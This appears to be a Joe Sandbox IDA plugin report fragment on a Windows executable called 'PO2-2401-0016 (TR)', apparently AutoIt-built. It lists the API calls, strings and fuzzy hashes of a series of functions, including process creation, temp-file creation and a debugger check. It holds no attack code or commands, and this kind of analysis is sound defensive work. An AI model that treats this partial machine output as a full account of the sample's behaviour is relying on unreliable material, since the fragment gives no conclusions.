                                • API ID: ClassMessageNameSend_wcslen
                                • String ID: ComboBox$ListBox
                                • API String ID: 624084870-1403004172
                                • Opcode ID: ccd710074e37496f2a0f6bd8c0bca5809918a0e0541a350b01f0907db9488ae3
                                • Instruction ID: 012fd4836a20d8bef3b827731a48e106013bbdb927a636c28b6f9f120157e76a
                                • Opcode Fuzzy Hash: ccd710074e37496f2a0f6bd8c0bca5809918a0e0541a350b01f0907db9488ae3
                                • Instruction Fuzzy Hash: DF01DB75640118F7CB04E794CA11AFF7BE89B21340F950015FC1177281EB209F1DD672
                                APIs
                                  • Part of subcall function 00182F5E: EnterCriticalSection.KERNEL32(?,?,00174F08,00000000,002188E0,0000000C,00174EC3,00151129,?,?,00184CB0,00151129,?,00182E29,00000001,00000364), ref: 00182F6D
                                • DeleteCriticalSection.KERNEL32(0021C020,?,?,?,?,00218BE8,00000010,0017914E), ref: 00184D3C
                                • _free.LIBCMT ref: 00184D4A
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.2061643602.0000000000151000.00000020.00000001.01000000.00000003.sdmp, Offset: 00150000, based on PE: true
                                 • Associated: 00000000.00000002.2061626649.0000000000150000.00000002.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2061698110.00000000001EC000.00000002.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2061698110.0000000000212000.00000002.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2061743079.000000000021C000.00000004.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2061759854.0000000000224000.00000002.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_150000_PO2-2401-0016 (TR).jbxd
                                Similarity
                                • API ID: CriticalSection$DeleteEnter_free
                                • String ID: 8
                                • API String ID: 1836352639-3897458245
                                • Opcode ID: f462692750377c20f0598cf1b5d9c57f9e5c5961749ce757ff1ce6389aa37ede
                                • Instruction ID: a7e1e5a69d56c9b06536f5d6583c0048923e471e003f9a3d1a21314f7cf416e6
                                • Opcode Fuzzy Hash: f462692750377c20f0598cf1b5d9c57f9e5c5961749ce757ff1ce6389aa37ede
                                • Instruction Fuzzy Hash: 59115E36560215DFD721AFE8E886BAC73B0BB14328F515245F4559B2B2CB74E9438F44
                                APIs
                                • CreateProcessW.KERNEL32(00000000,?,00000000,00000000,00000000,00000020,00000000,00000000,00223018,0022305C), ref: 001E81BF
                                • CloseHandle.KERNEL32 ref: 001E81D1
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.2061643602.0000000000151000.00000020.00000001.01000000.00000003.sdmp, Offset: 00150000, based on PE: true
                                 • Associated: 00000000.00000002.2061626649.0000000000150000.00000002.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2061698110.00000000001EC000.00000002.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2061698110.0000000000212000.00000002.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2061743079.000000000021C000.00000004.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2061759854.0000000000224000.00000002.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_150000_PO2-2401-0016 (TR).jbxd
                                Similarity
                                • API ID: CloseCreateHandleProcess
                                • String ID: \0"
                                • API String ID: 3712363035-2428598737
                                • Opcode ID: 1bff300e1ea180ed003e92d528049b2b12445c057370e66278166a4e0005ba96
                                • Instruction ID: 2e40c9d42616838996e9349ade22f8f60ebb21a2413dba469735e65309b06851
                                • Opcode Fuzzy Hash: 1bff300e1ea180ed003e92d528049b2b12445c057370e66278166a4e0005ba96
                                • Instruction Fuzzy Hash: 4FF054B1640310BEE220A7A17C49F773A5CEB04751F004420FB0CD91A1D6798B5282F8
                                APIs
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.2061643602.0000000000151000.00000020.00000001.01000000.00000003.sdmp, Offset: 00150000, based on PE: true
                                 • Associated: 00000000.00000002.2061626649.0000000000150000.00000002.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2061698110.00000000001EC000.00000002.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2061698110.0000000000212000.00000002.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2061743079.000000000021C000.00000004.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2061759854.0000000000224000.00000002.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_150000_PO2-2401-0016 (TR).jbxd
                                Similarity
                                • API ID: _wcslen
                                • String ID: 3, 3, 16, 1
                                • API String ID: 176396367-3042988571
                                • Opcode ID: 37e5b951eaf50a0f7e34debccb44a6d083bad41796b274c1f5f677d0e314550e
                                • Instruction ID: d8b50a33ec9524ef5f72f4682182af5cf1362b8ede9105729b58e483d968d7e4
                                • Opcode Fuzzy Hash: 37e5b951eaf50a0f7e34debccb44a6d083bad41796b274c1f5f677d0e314550e
                                • Instruction Fuzzy Hash: BCE02B0221422012923212799CC197F56D9CFE9750710182BFA89C23A6FB948D9193A1
                                APIs
                                • MessageBoxW.USER32(00000000,Error allocating memory.,AutoIt,00000010), ref: 001B0B23
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.2061643602.0000000000151000.00000020.00000001.01000000.00000003.sdmp, Offset: 00150000, based on PE: true
                                 • Associated: 00000000.00000002.2061626649.0000000000150000.00000002.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2061698110.00000000001EC000.00000002.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2061698110.0000000000212000.00000002.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2061743079.000000000021C000.00000004.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2061759854.0000000000224000.00000002.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_150000_PO2-2401-0016 (TR).jbxd
                                Similarity
                                • API ID: Message
                                • String ID: AutoIt$Error allocating memory.
                                • API String ID: 2030045667-4017498283
                                • Opcode ID: 6735a3df0f753386a8cf09c638a6d5f5beb310f7806833abef765eb20b0dc1f2
                                • Instruction ID: b522ed2816181fe1fa2d91f2f4153885c91ced9d734d2f32e260b30b0f567427
                                • Opcode Fuzzy Hash: 6735a3df0f753386a8cf09c638a6d5f5beb310f7806833abef765eb20b0dc1f2
                                • Instruction Fuzzy Hash: A0E0D8312843586BD21437957C03FCD7A848F19F25F20046AFB58994C38BE228A106E9
                                APIs
                                  • Part of subcall function 00184CDA: DeleteCriticalSection.KERNEL32(0021C020,?,?,?,?,00218BE8,00000010,0017914E), ref: 00184D3C
                                  • Part of subcall function 00184CDA: _free.LIBCMT ref: 00184D4A
                                  • Part of subcall function 00184D7A: _free.LIBCMT ref: 00184D9C
                                • DeleteCriticalSection.KERNEL32(00E1EE18), ref: 0017916A
                                • _free.LIBCMT ref: 0017917E
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.2061643602.0000000000151000.00000020.00000001.01000000.00000003.sdmp, Offset: 00150000, based on PE: true
                                 • Associated: 00000000.00000002.2061626649.0000000000150000.00000002.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2061698110.00000000001EC000.00000002.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2061698110.0000000000212000.00000002.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2061743079.000000000021C000.00000004.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2061759854.0000000000224000.00000002.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_150000_PO2-2401-0016 (TR).jbxd
                                Similarity
                                • API ID: _free$CriticalDeleteSection
                                • String ID: 8
                                • API String ID: 1906768660-3897458245
                                • Opcode ID: 48babaa7add179291dedab5ab6fbd2436407d191e0683475e05e74b32fbf6b9b
                                • Instruction ID: bed3602634e0a0e45c4f273efe46c94062bc9da7d95a50adb388372a32d3c222
                                • Opcode Fuzzy Hash: 48babaa7add179291dedab5ab6fbd2436407d191e0683475e05e74b32fbf6b9b
                                • Instruction Fuzzy Hash: BEE01A37820560EBC732BBE8FC99A9977A4BB59328B16141AF40993132CB21BC538B44
                                APIs
                                  • Part of subcall function 0016F7C9: InitializeCriticalSectionAndSpinCount.KERNEL32(?,00000000,?,00170D71,?,?,?,0015100A), ref: 0016F7CE
                                • IsDebuggerPresent.KERNEL32(?,?,?,0015100A), ref: 00170D75
                                • OutputDebugStringW.KERNEL32(ERROR : Unable to initialize critical section in CAtlBaseModule,?,?,?,0015100A), ref: 00170D84
                                Strings
                                • ERROR : Unable to initialize critical section in CAtlBaseModule, xrefs: 00170D7F
                                Memory Dump Source
                                • Source File: 00000000.00000002.2061643602.0000000000151000.00000020.00000001.01000000.00000003.sdmp, Offset: 00150000, based on PE: true
                                 • Associated: 00000000.00000002.2061626649.0000000000150000.00000002.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2061698110.00000000001EC000.00000002.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2061698110.0000000000212000.00000002.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2061743079.000000000021C000.00000004.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2061759854.0000000000224000.00000002.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_150000_PO2-2401-0016 (TR).jbxd
                                Similarity
                                • API ID: CountCriticalDebugDebuggerInitializeOutputPresentSectionSpinString
                                • String ID: ERROR : Unable to initialize critical section in CAtlBaseModule
                                • API String ID: 55579361-631824599
                                • Opcode ID: 767e5cc5c23725548c49dff5bea51ddb57795cea1c013934f6da556870e0da2c
                                • Instruction ID: 1ecf9bbbeb07ae63412d363eacc90ded98c658e9610da08c45e8baff5d4faca0
                                • Opcode Fuzzy Hash: 767e5cc5c23725548c49dff5bea51ddb57795cea1c013934f6da556870e0da2c
                                • Instruction Fuzzy Hash: 8FE06D742007818FD3319FF9E94874A7BF1EB18744F00896DE89ACA651EBB0E4868B91
                                APIs
                                • __Init_thread_footer.LIBCMT ref: 0016E3D5
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.2061643602.0000000000151000.00000020.00000001.01000000.00000003.sdmp, Offset: 00150000, based on PE: true
                                 • Associated: 00000000.00000002.2061626649.0000000000150000.00000002.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2061698110.00000000001EC000.00000002.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2061698110.0000000000212000.00000002.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2061743079.000000000021C000.00000004.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2061759854.0000000000224000.00000002.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_150000_PO2-2401-0016 (TR).jbxd
                                Similarity
                                • API ID: Init_thread_footer
                                • String ID: 0%"$8%"
                                • API String ID: 1385522511-3788803983
                                • Opcode ID: 6327a739b9408ed411e364921c35949e7bdaf554e2ddf2df6ae23832d3ba7f46
                                • Instruction ID: d619edb0e12bfc303d7e298afb9e4b9e67d831740ed940c398311992d8affb43
                                • Opcode Fuzzy Hash: 6327a739b9408ed411e364921c35949e7bdaf554e2ddf2df6ae23832d3ba7f46
                                • Instruction Fuzzy Hash: 06E02636810A20FBCA1D975CFE58A8833A1BF18320BD0A268E4028F2D19B3628768644
                                APIs
                                • GetTempPathW.KERNEL32(00000104,?,00000001), ref: 001C302F
                                • GetTempFileNameW.KERNEL32(?,aut,00000000,?), ref: 001C3044
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.2061643602.0000000000151000.00000020.00000001.01000000.00000003.sdmp, Offset: 00150000, based on PE: true
                                 • Associated: 00000000.00000002.2061626649.0000000000150000.00000002.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2061698110.00000000001EC000.00000002.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2061698110.0000000000212000.00000002.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2061743079.000000000021C000.00000004.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2061759854.0000000000224000.00000002.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_150000_PO2-2401-0016 (TR).jbxd
                                Similarity
                                • API ID: Temp$FileNamePath
                                • String ID: aut
                                • API String ID: 3285503233-3010740371
                                • Opcode ID: 3b53b76085a8121009f87d432492e180ab02e1e188c50920210ee1498e0725ba
                                • Instruction ID: 410ae1509be0c9d4359b6a238850cdf57ee8c7a2887503001cb1b80c720b5ab3
                                • Opcode Fuzzy Hash: 3b53b76085a8121009f87d432492e180ab02e1e188c50920210ee1498e0725ba
                                • Instruction Fuzzy Hash: 39D05E7290032867DA20A7E4AC4EFCF7A7CEB05751F0002A1BB55E6091DAB099C5CAD0
                                APIs
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.2061643602.0000000000151000.00000020.00000001.01000000.00000003.sdmp, Offset: 00150000, based on PE: true
                                 • Associated: 00000000.00000002.2061626649.0000000000150000.00000002.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2061698110.00000000001EC000.00000002.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2061698110.0000000000212000.00000002.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2061743079.000000000021C000.00000004.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2061759854.0000000000224000.00000002.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_150000_PO2-2401-0016 (TR).jbxd
                                Similarity
                                • API ID: LocalTime
                                • String ID: %.3d$X64
                                • API String ID: 481472006-1077770165
                                APIs
                                • FindWindowW.USER32(Shell_TrayWnd,00000000), ref: 001E232C
                                • PostMessageW.USER32(00000000,00000111,00000197,00000000), ref: 001E233F
                                  • Part of subcall function 001BE97B: Sleep.KERNEL32 ref: 001BE9F3
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.2061643602.0000000000151000.00000020.00000001.01000000.00000003.sdmp, Offset: 00150000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_150000_PO2-2401-0016 (TR).jbxd
                                Similarity
                                • API ID: FindMessagePostSleepWindow
                                • String ID: Shell_TrayWnd
                                • API String ID: 529655941-2988720461
                                APIs
                                • FindWindowW.USER32(Shell_TrayWnd,00000000), ref: 001E236C
                                • PostMessageW.USER32(00000000), ref: 001E2373
                                  • Part of subcall function 001BE97B: Sleep.KERNEL32 ref: 001BE9F3
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.2061643602.0000000000151000.00000020.00000001.01000000.00000003.sdmp, Offset: 00150000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_150000_PO2-2401-0016 (TR).jbxd
                                Similarity
                                • API ID: FindMessagePostSleepWindow
                                • String ID: Shell_TrayWnd
                                • API String ID: 529655941-2988720461